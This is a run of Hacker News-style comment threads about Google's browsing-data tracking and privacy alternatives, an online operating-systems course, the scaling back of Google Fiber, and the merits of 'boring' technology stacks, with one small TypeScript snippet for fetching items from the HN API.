A recent podcast (TAL? Radiolab?) just discussed the retreats Google has made over time with respect to privacy and intrusive advertising. I tried to find it - someone have a link? This very much continues the theme. It is important to note how much Sergey and Larry hated advertising and the belief they held that any advertising based search engine would inherently corrupt itself.

For people who didn't read the article but want to opt out of this tracking:

To opt out of Google's identified tracking, visit the Activity controls on Google's My Account page, and uncheck the box next to "Include Chrome browsing history and activity from websites and apps that use Google services." You can also delete past activity from your account.

It all serves to make me happy that I'm using Firefox with uMatrix as my daily driver, and only use Chrome (with uBlock Origin) for the rare things that I can't get to load properly because of all the cross-site dependencies.

Google seems no better than Facebook when it comes to privacy, and I'm not just talking about how far they're willing to go in tracking users, but also how they are willing to lie and violate their users' trust so they can collect more data.

Facebook is now getting into trouble in the EU for breaking their promise about not sharing WhatsApp data, and yet Google still goes ahead and does this. I hope the European Commission adds this as one more charge against Google.

Without real enforcement the companies will continue to do whatever the hell they want.

1) Does not track user activity. Hosted in Canada.
2) Does not leak referrer to visited sites.
3) No ads. Will be considering affiliate links, a paid API, and/or "good" ads -- ads people want that don't compromise privacy.
4) Integrated feed reader which also provides search results.
5) Activation codes (like DDG bangs, so ?g instead of !g).
6) Plugins written in JS/data to be searched can be added at any time.
7) Deep search -- get results from the search results pages of several sites at a time. Try https://solveforall.com/answers.do?q=rx+480&client.kind=web&...

There's clearly a lot more work to be done, and I plan on open-sourcing this soon, but please try it out and let me know any feedback you have!

I use google and have chosen to give up a lot of my privacy to use their services.

One thing I was never willing to do, though - and I had an instant emotional reaction against it - was allow them access to all my email.

They can have my GPS coordinates at all times, my web search history, etc, but they can't get into the inner workings of my life and my thoughts.

So back before I had any real use for it, I just registered myname@myfirstandlastname.com and used that for my email address. It felt like a natural move. It does still bother me that a lot of the people I email use Gmail, so Google still ends up siphoning off a lot of the contents of my email.

I see a lot of people talking about FastMail instead of GMail, but I don't know why more geeks don't register their own domain name which has several advantages (including looking better and more professional). The one downside is that mail search sucks. I'd love to get some decent search without giving up privacy somehow.

More and more changes that do not bode well for Google: first they changed things so they can track what numbers you dial, then they tried that with your Google Chrome history and tabs if you synced them to your account, and now this? People wondered why I stopped being a Google evangelist after 2014.

This is yet another reminder that it's important, especially for HN readers, to continue to give support to groups such as Mozilla and their Firefox platform. The more widespread Google and Chrome usage is, the more Google can push these changes with little to no resistance.

Does anyone know the specifics of Google's privacy practices for G Suite (formerly Google Apps for business)? They claim no advertising, but do they use your data for anything else, and do they still build shadow profiles? If you're already buying 1 TB of storage for Google Drive, then you can instead sign up for the $10/month G Suite plan and get 1 TB of storage with ad-free versions of their apps.

I think DuckDuckGo often becomes an alternative that isn't an alternative, in the sense that yes, it's there, and you're frustrated with Google's behavior, so you persist for a whole day and then have to revert back to Google with tail between legs. So it's more of an alternative in name.

With the sheer scope of Google properties, there is always going to be a temptation for 'value searchers' within the organization to give in to dark patterns and compromise users. I have been trying Yandex search and email and it's fairly decent. Email is good, and search appears to be a much more serious offering compared to DuckDuckGo, but it still has some way to go.

However we need diversity and decentralization to prevent concentration and inevitable abuse of power.

I expect Google will experience outages of more than 15 minutes for core services in the coming months. This is based on a significant uptick in DDoS sophistication, which has been referenced by Schneier -- although not in reference to Google.

If changes like this announcement convince people to move away, I am all for it. This just proves not only their power, but the danger of a single point of failure.

As of now, there is no viable alternative to Google. There is no distributed, free, independent search engine that provides search results as relevant as Google's while caring for users' privacy.

Nor do I think it is financially possible to run such a thing without someone having a vested interest in the metadata behind such an endeavour. There is a silent demand for such an effort, however.

I wasn't expecting much at first as an OS professional, but wow this is great! Flipping through the slides, it's just the right amount of info and context to develop a working knowledge and vocabulary without much time investment or getting overwhelmed or losing interest. Didn't look at the videos or assignments yet.

If you work in some type of ops role this will really accelerate your career.

If you are a programmer and forgot or did not take an OS internals class, ditto.

You will not unlock maximum throughput, minimum latency or a balance without understanding these concepts.

Thanks for posting this. I was looking for more operating system courses. I'm currently watching Kirk McKusick's FreeBSD Kernel Internals course [1], which isn't available for free (the first hour is [2]), but which I thought was worth the money. I find it really amazing that I can watch a course taught by someone who is such an expert in UNIX-like systems.

Along with a general in-depth OS course, I would like to find a Linux-specific course. Does anyone know of a good Linux internals course?

UNIX-like kernels are easy, in that you don't have to have that much running before you can run "Hello World". I'd like to see more on microkernels. You have to have more pieces running before you get to "Hello World".

Also, the emphasis on virtual memory and page faults is becoming dated. Paging out to disk is obsolete technology. RAM is too cheap, and mobile devices don't page.

The professor who made this class is leaving UB next fall. I'd be lucky to be able to attend this one last course under him (the class is going to be a full house this time) before he moves on from UB, a sad event in itself :(

I have to say - the course is very well organised. For me at least, the structure and flow are exactly how I approach my learning: a video overview -> a thought-provoking discussion -> the problems -> hints -> the academic paper -> the solution. Neat.

This is a godsend! Just today I was digging up notes and resources from around the internet, wanting to put my C/C++ skills to good use and build and learn something. I was always attracted to OSes (I have an OS class in a year, but I couldn't wait), so thanks so much for sharing this! Can't wait to get started tonight!

That sucks for citizens of the US. I think the Swedish (Nordic?) model for bringing internet connectivity to its citizens is superior.

The municipalities own (most of) the networks and all the fiber cables, letting companies use them for a small(ish) fee. These companies then sell access to customers. This helps people get the best deals and ensures that the networks are continually upgraded.

For example, I have 250/100 Mbit/s for free; my rent pays for it. But I could, if I wanted, easily upgrade to 1 Gbit/s up and down. I can change ISP (even if that wouldn't be paid for by my rent), and I know I could always get the same connectivity speeds.

Although, while this is true for many parts of Sweden, it's not available for everyone. Some places still have networks owned by one company without any access to the city network.

Forgive me if I'm incorrect... The way I understand it is that they are halting planning in cities that they marked as potential locations, but that does not mean they are discontinuing the rollout and service in cities that are already in progress.

For example, they have been trying to roll out fiber in Nashville for over a year now but have only been able to install on less than a dozen utility poles so far.

This is because of rules that prevented anyone other than the owner of the existing lines from moving anything. It meant that if Google wanted to add lines to a pole with existing AT&T and Comcast lines, both companies would have to move their own lines independently of each other, in coordination, so roads would have to be closed three separate times, once for each vendor. Nashville recently passed the One Touch Make Ready ordinance, which allows approved vendors to do all of the work at the same time.

Well, Google announced they were exploring a fiber rollout in Chicago. Now both AT&T and Time Warner Cable have 1G service throughout parts of the city.

Alternatively, one can look at this not as a failure, but as a success. The point of Google fiber was to force carriers to get faster internet to everyone. It appears that it has been working. This benefits google directly as their properties such as Youtube can deliver more and better content.

So bummed to read this. Even though I wasn't going to directly benefit from Google Fiber, it was sure nice to have a non-entrenched player tackle this market.

From the big G's standpoint, it makes good business sense to exit this market. I sure hope the subtext in the article comes to fruition, i.e. that Google / Alphabet has figured out a better way to get high-speed internet to homes in the US sans fiber.

In an ideal world, this fast fiber internet ought to be a municipally managed utility, with my tax dollars paying for the fiber in the ground. Then, my take home dollars paying for whatever competing service(s) I choose to light up said fiber to bring me access to the net.

The title of this post is pretty deceptive; it clearly implies that the Fiber project altogether is being halted.

My understanding from this article, amongst others, is that they are simply rethinking their approach: rather than laying down fiber throughout all target cities, they'll beam high-speed internet from local way points to the roofs of high-rises (like WebPass, which they acquired, does in SF).

If that seems a viable approach, it is pretty reasonable to halt expensive infrastructure operations laying hard-wired fiber and cut the jobs associated with those logistics and operations.

This title about what's happening to Google Fiber is much more direct, honest, and to the point than the corporate-PR Google post and its title, which confused me into thinking I was actually going to be able to sign up for Google Fiber.

Their title: "Advancing our amazing bet"

The point being that our ISPs right now need some disruption, and I think a lot of people were hoping this Google Fiber would catch on. A lot of folks assumed Google would eat whatever losses it took to make this a hit. Apparently not; apparently short-term profits trump everything else.

GF has been tearing up our neighborhood this week and last, laying cable (I'm in Chapel Hill). AT&T did the same about 6 months back. I was holding out for Google, but this makes me think that even when they get it up and running, the support will be nonexistent. So maybe better to go with the devil we know (we already have AT&T U-Verse, just not gigabit). At least they lasted long enough to force AT&T's hand...

They backed out of Portland after spending a ton of money and time with city officials. Sad to hear this is not happening and hope Google finds a way to get back into this because the options today are a joke. This will just embolden companies like Comcast to charge more for horrible service.

I wrote about this elsewhere and am pasting my thoughts here as I think they're relevant to this community:

1) Google Fiber is dead. Long Live Google ISP.

Google cannot afford to lay fiber in the ground because it's a long game and Google doesn't really want to play the long game (they just want to put pressure on competitors so they can move more bits along the wires, generating more searches and more streams with which to shove ads in your face). Fiber never was the most efficient way to do this, but there's something sexy about "Google Fiber" as opposed to "Google Point to Point Radio Towers". The reality is that wireless delivery of bits is way cheaper than fiber because you don't have to tear the ground up (over the last mile obviously since the arteries must be fiber links).

Clarification: "long" refers to 30-year payback periods for physical asset investment. There are a lot of things with higher returns on that timeline than fiber that google can invest in. I don't actually think it's profitable for anyone to build unsubsidized networks. This is why networks should be public and operators should be private, but that's a topic for another day!

2) Fiber is cheap, construction is expensive.

When I helped Comcast build out the fiber network in SF, what struck me was the relative cheapness of the assets we were putting in the ground compared to the cost of tearing up the street. The conduit and the glass inside the conduit cost almost nothing, but tearing up the street in SF is $300/sq ft. Crossing cable car tracks was like $50,000. Then there's the actual cost of construction: people. Getting contractors to arrive on time, finish on time, and avoid overtime is fraught with peril. It's actually really hard to move physical atoms around in a manner similar to programmatic systems, and so many models that have real world elements stumble against the harshness of actuality. I suspect Google's cost modeling for building a fiber network was optimistic.

3) Wireless is fast, but does it scale to city size?

It's not hard or particularly expensive to deliver gigabit over wireless. You basically need a tall building to rain down radio waves onto the masses. What I wonder about, given that we have no cities running on majority wireless point to points, is what happens when you hit scale? That is to say, point to points have a limited wireless footprint (because using beamforming we don't need to splay the signal everywhere, we just send it in one direction), but one can easily imagine a saturated wireless environment as generating a significant amount of noise. Wireless networks are easy when there's only a few objects on the network but get significantly harder as the physical area reaches device saturation. That is to say, WebPass might be super easy to operate when only a handful of buildings are on WebPass, but it might be much harder if a whole section of the city is online.

4) Google bought WebPass a while back.

The writing has been on the wall for a while that the fiber game was killing uncle Google. I can only hope that they don't bow out completely. I think that wireless makes Google significantly less of an existential threat to their carrier partners as well.

Overall, I remain cautiously optimistic about Google's future as an ISP.

On a final note: Google Fi is not an answer to Google fiber disappearing. The two are tangential, disjointed offerings that cannot, for a bunch of reasons, compete with one another (most notably the wireless data caps).

The Google Fiber rollout in my neighborhood has been a debacle from the start.

They walked around and put up door tags -- really, really big ones saying, "Google Fiber is coming!" -- and immediately after that, the zero-crime neighborhood I live in had a slew of break-ins. Anyone who didn't remove this massive door tag was an easy target; the crooks knew who was home and who wasn't.

Then like a week later... they put the exact same door tag up on all the doors. And we all laughed... but we were like, "WTF, Google..." Then the next day they put the exact same door tag up again, even doubling it up on homes that already had one. The door tags were just promos to sign up; they didn't tell us to mark our sprinkler systems, or who to call in case the construction crew accidentally cut our water lines...

The actual cable laying came about a month later... and it's been going on for 7 weeks at this point. Some days the guys work, most they don't. Doesn't appear to be any pattern to it. There are a bunch of expensive drilling and trenching machines parked at the end of my cul-de-sac and along the street in the spots where residents used to park. 7 weeks and counting...

I think it's hilarious how many people think it's consistent to simultaneously hold the opinion that this is a tragedy and that Google Fiber was the ISP that they wish they could have, while also supporting federally-imposed "net neutrality" and the implicit claim behind it, which is that all ISPs are just dumb pipes that are moving bits, and that consumers are agnostic about who does it.

All the sheep on Reddit who got behind FCC mandated "net neutrality" are directly responsible for this. Urbanites get a warped view of this country and vastly underestimate the amount of places where satellite internet is their only option. Yet they have the nerve to bitch and moan about what a tragedy it is that they can't stream 4k video without buffering. The government must fix this! To hell with the rural schoolchildren and their lack of access to wikipedia, I want to watch high-def cartoons!

There was so much innovation taking place behind the scenes to provide a decent web-browsing experience via satellite internet and WISPs. And it's all for naught.

This what I like to call "both/and". I like both the old reliable and the new shiny. So often people want things to be "either/or". Either I'm going to use this solution or that one.

The key is to know the context of each, and I think this article does a very good job of describing when each ought to be used. He uses the boring reliable stuff on his own things, because he is beholden to no one and does not need to justify his decisions. And he also works with the exciting new stuff with clients, because it is simply easier to sell it to clients who are caught in the Silicon Valley echo chamber.

Both/And is like trying to hold a small bird in your hand: too tight and you'll crush the bird and it will die, too loose and it will fly away.

I often hear this sentiment that new languages and frameworks du jour pop up every week, and that past a certain age a fellow just wants to learn a single reliable stack and collect a weekly paycheck.

Am I the only one who just hasn't experienced this feeling? There used to be Rails/Django and jQuery. Now there's Node and React. Both revolve around extremely simple ideas. Spend an afternoon reading the React docs, and you'll know everything you need. Take another afternoon after that and learn Redux. If you have another few afternoons, learn Clojure, and see what the Lisp folks have gotten going with reagent/re-frame. There isn't that much to keep up with.

It's the same with complaints about JS having too many transpiled dialects. These dialects make life easier. There are good ideas in them. For example, Livescript is wonderfully concise and elegant, at no cost of readability once you grok Livescript. It makes your code more readable and faster to write. How is this a bad deal?

I sometimes wonder if people are just annoyed that they need to learn new paradigms at all. It's not like ours shift at an especially fast rate.

Well, I don't know if "boring" is the word I'd use, but I like _transparent_ stacks: if I make a mistake, it tells me where I made a mistake in a way that I can interpret. All of the "boring" stacks have this property.

omg, this guy is spot on. My day job is Magento (hell), but I am absolutely in love with boring ol' C#, along with the new ASP.NET Core framework & Kestrel web server. All of my side projects are built using C#, and I don't use jQuery or Angular or React or Reactive. I use plain old vanilla JavaScript, because I care about zero HTTP requests & zero bloat & zero BS.

It's a great point--it just seems arbitrary to draw the line in the sand of having a "boring stack" that consists of SQL Server and C#.

I mean, that, as a minimum, means you're running and maintaining a Windows server, along with antivirus, backups for the OS, and backups for the database. Any time Windows updates come along, your service will be unavailable. Every couple of years, you'll need to buy a new license, upgrade Windows, and make sure everything comes up smoothly. This likely will involve fixing and troubleshooting some issues. You'll need to have some monitoring set up to make sure you don't end up running out of disk space on Saturday morning.

Or maybe you have more than one Windows server (to avoid downtime from a single server), but that makes your stack decidedly less "boring." Now you're dealing with at least a load balancer and making SQL Server redundant.

I mean, I guess it's more boring than chasing the latest front-end reinvention or maintaining MongoDB, but there's some room for improvement here, clearly. Containerized deployments (via Docker or a "serverless" architecture) might be able to help.

I agree in general but why would you use Windows/SQLSrv for internet-based products? I'm fine with it on the desktop, but the extra costs and time devoted to things like activation are a non-starter as far as I'm concerned. I believe they finally have ssh and package mgrs available, but don't you still have to install them manually?

There's plenty of boring stacks on Unix that are free, in both senses of the word.

This is how I feel. I have friends that are always going on about all the latest "best practices" and cool hipster stuff like docker swarms and microservices. Meanwhile I've kept my own projects using boring old (or rather tried and tested) technologies and languages like python.

I don't like it when people are recommending new buzz words every week.

If you mean "familiar" then you're right: something you know is better than something you don't. (But it's not the way to learn or expand your horizons.)

If you mean "stable" then the whole thesis is a bit of a tautologycrucially, there's no fundamental contradiction between "new and shiny" and "stable", and "boring" stuff is often also unstable/insecure/bug-prone (think PHP or C).

If you mean "popular" or "mainstream" then you're putting way too much stock in the judgement of crowds. Crowds and fashion are fickle and the popularity of a product is a poor indicator of any intrinsic qualities.

I've seen people using all three of these definitions (and linear combinations thereof) when talking about these things. More too, probably.

I think it's important to separate out exactly what you mean by words like "boring" or "practical" when talking about software tools and abstractions, to understand exactly what's going on and to communicate clearly.

I agree. Kind of. You get to choose the kind of problems you work on and the way you break up your time. If you want to innovate on the infrastructure, and you find that interesting or worth the gains for the kind of scenarios you work on, then go for it. At the same time, focusing on solving problems in the programming infrastructure and spinning cycles learning new techniques means you get less time actually solving problems in your actual problem domain. You don't need a $3000 carbon fiber road bike to get to your friend's house down the street, no matter how many articles you read about how good that road bike is. I suppose the idea is to use the most boring stack that can get the job done.

I've flip-flopped several times over the last 15 years on the question of server-side vs. client-side view logic. I literally start each new project with a fresh technical review and evaluation of this question.

I'd have flipped permanently to client-side if the JS stacks matched the quality and consistency of the server-side stacks (I use ASP.NET MVC). I know it has been a rapidly evolving space, hence the churn. But here's the thing - with software, I've come to prefer intelligent design over Darwinian evolution. On the server side we have intelligent design; on the client we have evolution. On the server, we have stability and a roadmap. On the client, we don't.

With that said, painting pages on the server to send down to the client just doesn't smell right anymore.

I personally enjoy the new and fancy. In fact, I try new stuff because I enjoy trying it out, and the payoff comes the moment you finally understand it.

That said, if I had to choose a tech stack for work, I'd choose something I'm comfortable with and know a lot about (compared to the rest of what's available) - because in the end, it's not about having something new and shiny to blog about, but about solving the problem my company is trying to solve.

"Good old C#, SQL Server and a proper boring stack and tool set that I know won't just up and fall over on a Saturday morning and leave me debugging NPM dependencies all weekend instead of bouldering in the forest with the kids."

Microsoft tax.

Yes, you can get alternative C# implementations [0], but SQL Server? Having to deal with "MS tools" in an era of high-quality alternatives? Boring for me would be Perl/Postgres: both in their twenties, solid, reliable, with plenty of quality developers and language support.

I'm between jobs and thinking of starting a SaaS on the side to fund my goal of going backpacking for a few months next year.

However, the number of microservices I'm thinking of putting it together with means it'll require a decent amount of maintenance and attention that, as far as I can tell, can't be automated. That isn't exactly what I want in the back of my mind the whole time I'm travelling... but then again, you can't have your cake and eat it too.

Anyone who has a successful hands-off SaaS built on a modern stack care to chip in on ways of mitigating this?

I like the point about building systems that take care of themselves and are largely hands-free. I'd say that applies regardless of platform (or "shininess"), though. The author has clearly internalized one of the more important lessons in engineering: design for maintainability, with an ultimate goal of zero- or low-effort maintenance and extension.

I'm not sure the platform itself matters as much to achieving that goal as the decision-making ability of the engineers, though. Maybe a tendency to pick shiny for shiny's sake is just one way poor decision-making surfaces? Still, I don't see a problem with picking an appropriate solution that happens to be shiny.

MS SQL Server is awful; try just about any other DB and you'll see. I can't trust this author after "good old SQL Server". And I don't see anything in that article except old-man grumbling. Programmers should always keep learning, and they know that from the very start of their careers.

If you are doing a side project, you can choose between solving a real problem or learning new tech. It is hard to do both simultaneously in the time most people give to side projects. Hell, it's hard even if you're full time.

Learning new tech in a side project is a worthy thing to do and I have built some nice little toy Haskell, Elm, JS and Java projects.

However, I am more productive in my usual C#, so if I wanted to get something done quickly, e.g. an MVP website, that would probably be the best choice despite the advantages of other languages (PHP: cheap shared hosting, easy to deploy; Haskell: excellent type system, most bugs caught at compile time; etc.).

One exception: I recently wanted to scrape the HN API with multiple requests in flight at a time, and I found this easier on Node.js than in C#, because I could be sure I wouldn't get exceptions about my thread pool running out of threads, etc. :-) A sketch of the approach is below.
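Something like this, for instance: a TypeScript sketch against the public HN Firebase API, with a simple worker pool to cap in-flight requests. The item IDs and the concurrency limit are arbitrary, and it assumes Node 18+ for the global fetch:

```typescript
// Fetch HN items with at most `maxConcurrent` requests in flight.
async function fetchItem(id: number): Promise<unknown> {
  const res = await fetch(`https://hacker-news.firebaseio.com/v0/item/${id}.json`);
  return res.json();
}

async function fetchAll(ids: number[], maxConcurrent = 8): Promise<unknown[]> {
  const results: unknown[] = new Array(ids.length);
  let next = 0;
  // Each worker pulls the next id until the queue drains; the event loop
  // is single-threaded, so `next++` needs no locking.
  async function worker(): Promise<void> {
    while (next < ids.length) {
      const i = next++;
      results[i] = await fetchItem(ids[i]);
    }
  }
  await Promise.all(Array.from({ length: maxConcurrent }, () => worker()));
  return results;
}

fetchAll([8863, 2921983, 121003]).then((items) => console.log(items));
```

No thread pool to exhaust--the concurrency cap is just an integer.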

Maybe, if you work at a bank, change one line of code per month, document that change in 10 Word documents, and spend most of your time drinking coffee and dozing through PowerPoint presentations with 1,000 attendees.

It depends on whether you like the boring stack, and also on what your normal stack is. If you mostly write Ruby, Sinatra or Rails should be your first port of call: they're widely used frameworks in your language.

But no, don't chase the zeitgeist for no reason: the zeitgeist is by definition new, and new stuff tends to break a lot.